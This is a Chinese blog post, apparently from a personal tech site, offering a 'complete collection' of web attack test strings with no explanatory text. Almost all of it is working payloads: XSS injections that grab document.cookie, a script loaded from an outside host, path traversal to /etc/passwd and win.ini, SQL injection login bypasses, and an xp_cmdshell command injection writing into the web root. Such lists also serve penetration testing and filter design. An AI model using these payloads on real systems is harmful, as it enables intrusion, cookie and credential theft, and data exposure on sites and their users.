### XSS跨站测试代码大全 '> ='> %3Cscript%3Ealert('XSS')%3C/script%3E %0a%0a.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html %3f.jsp %3f.jsp ?sql_debug=1 a%5c.aspx a.jsp/ a/ a? "> ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E %3Cscript%3Ealert(document. domain);%3C/script%3E& %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini '';!--"=&{()} "";' > out getURL("javascript:alert('XSS')") a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); "> <" PT src="http://xss.ha.ckers.org/a.js"> link admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a[/code] 除特别注明外,本站所有文章均为wangyongdong原创,转载请注明出处来自 https://wangyongdong.com/post/121 AJAX POST 跨域相关问题 跨域是我们在开发中经常遇到的问题,主要原因还是由于 PHP CodeBase: 过滤XSS攻击的PHP 关于XSS攻击,如果不是很清楚,可以先看看以下三篇文 Copyright © 2024. 王永东博客 All rights reserved. 王永东博客 | 京ICP备15059831号-2